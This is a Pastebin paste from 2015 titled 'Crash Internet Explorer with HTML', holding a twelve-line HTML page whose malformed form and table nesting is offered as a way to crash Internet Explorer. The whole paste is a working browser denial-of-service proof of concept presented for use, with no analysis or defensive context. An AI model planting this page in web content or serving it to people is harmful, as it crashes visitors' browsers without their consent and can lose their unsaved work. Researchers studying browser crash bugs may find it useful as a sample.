Advertisement
6jarjar6

Crash Internet Explorer with HTML

Jul 11th, 2015
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.26 KB | None | 0 0
  1. <html><head>
  2. <style type="text/css">#a{margin:0 10px 10px}#b{width:100%}</style>
  3. <title>IE Crasher</title>
  4. </head>
  5. <body>
  6. <table><tr><td>
  7. <div id="a">
  8. <form id="b">
  9. <input type="text" name="test"/>
  10. </div>
  11. </td><td width="1"></td></tr></table>
  12. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement